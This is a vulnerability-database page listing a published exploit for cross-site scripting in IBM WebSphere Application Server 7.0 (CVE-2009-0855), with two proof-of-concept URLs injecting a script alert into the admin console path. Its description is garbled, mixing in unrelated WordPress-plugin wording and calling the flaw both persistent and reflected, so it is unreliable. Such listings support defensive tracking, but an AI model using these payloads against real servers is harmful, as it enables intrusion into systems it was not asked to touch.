Vulners
Lucene search
IBM Websphere Application Server 7.0 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | IBM WebSphere Application Server < 6.1.0.23 Multiple Vulnerabilities | 17 Apr 200900:00 | – | nessus |
| IBM WebSphere Application Server < 6.1.0.23 Multiple Flaws | 15 Apr 200900:00 | – | nessus |
 | CVE-2009-0855 | 26 Feb 200900:00 | – | circl |
 | IBM WebSphere Application Server Cross-Site Scripting - Ver2 (CVE-2009-0855) | 31 Mar 201400:00 | – | checkpoint_advisories |
 | CVE-2009-0855 | 9 Mar 200900:00 | – | cve |
 | CVE-2009-0855 | 9 Mar 200900:00 | – | cvelist |
 | CVE-2009-0855 | 9 Mar 200921:30 | – | nvd |
 | Cross site scripting | 9 Mar 200921:30 | – | prion |
 | PT-2009-3447 · Ibm · Ibm Websphere Application Server | 9 Mar 200900:00 | – | ptsecurity |
`# Exploit Title: IBM Websphere Application Server 7.0 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2022-12-02
# Author: Milad karimi
# Software Link: https://www.ibm.com/support/pages/6107-websphere-application-server-v61-fix-pack-7-windows
# Version: 7.0
# Tested on: Windows 10
# CVE: 2009-0855
1. Description:
This plugin creates a IBM Websphere Application Server from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>
http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>.jsp
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2022 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 24.3
EPSS0.2462